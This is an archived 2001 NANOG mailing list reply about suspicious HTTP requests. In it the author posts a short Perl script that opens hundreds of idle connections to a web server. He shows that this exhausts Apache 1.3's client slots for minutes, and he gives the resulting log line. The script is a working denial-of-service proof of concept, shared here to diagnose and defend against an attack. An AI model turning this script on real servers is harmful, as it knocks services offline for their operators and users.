nanog mailing list archives
Re: Pattern matching odd HTTP request
From: Bill McGonigle <mcgonigle () medicalmedia com>
Date: Tue, 18 Sep 2001 18:58:42 -0400
On Tuesday, September 18, 2001, at 06:30 PM, Jake Khuon wrote:
You start to suspect a DDOS port-flood attack. It's certainly causing me tospawn a lot of httpds and occupying a lot of ports.
This isn't good. I wrote a bit of test code to see what would happen if I had alot of timeouts:
#----- use Net::Telnet; my $num_open = 400; sub doConnect { my $telnet_handle = Net::Telnet->new(Port=>'80'); $telnet_handle->open("localhost"); if ($num_open > 0) { print "$num_open..."; $num_open--; doConnect(); } else { sleep(20); } } doConnect(); print "\n"; #-----On Apache 1.3, this brings the number of httpd processes up to MaxClients, then each one waits 300 seconds (the default timeout) for the connections to time out, at which point the other connections are made, and the cycle continues. A DDOS of this nature would be particularly nasty. One client (happened to be on localhost) tied up the server for 6 minutes this way with the default Apache config.
Here's what the logfile for these attempts looks like: 127.0.0.1 - - [18/Sep/2001:18:43:06 -0400] "-" 408 - Doh! ----- Bill McGonigle Research & Development Medical Media Systems, Inc. http://www.medicalmedia.com +1.603.298.5509x329
Current thread:
- Pattern matching odd HTTP request Jake Khuon (Sep 18)
- Re: Pattern matching odd HTTP request Bill McGonigle (Sep 18)
- Re: Pattern matching odd HTTP request mike (Sep 18)
- Re: Pattern matching odd HTTP request Jake Khuon (Sep 18)
- Re: Pattern matching odd HTTP request Karsten W. Rohrbach (Sep 18)
- Re: Pattern matching odd HTTP request Jake Khuon (Sep 18)
- Re: Pattern matching odd HTTP request Bill McGonigle (Sep 18)
- Re: Pattern matching odd HTTP request Karsten W. Rohrbach (Sep 18)
- Message not available
- Re: Pattern matching odd HTTP request Karsten W. Rohrbach (Sep 19)
- Re: Pattern matching odd HTTP request Bill McGonigle (Sep 20)
- Message not available
- Re: Pattern matching odd HTTP request Karsten W. Rohrbach (Sep 20)
- Re: Pattern matching odd HTTP request Dominic J. Eidson (Sep 20)
- Re: Pattern matching odd HTTP request mike (Sep 18)
- Re: Pattern matching odd HTTP request Bill McGonigle (Sep 18)
- Re: Pattern matching odd HTTP request E.B. Dreger (Sep 18)
- <Possible follow-ups>
- Re: Pattern matching odd HTTP request Bill McGonigle (Sep 20)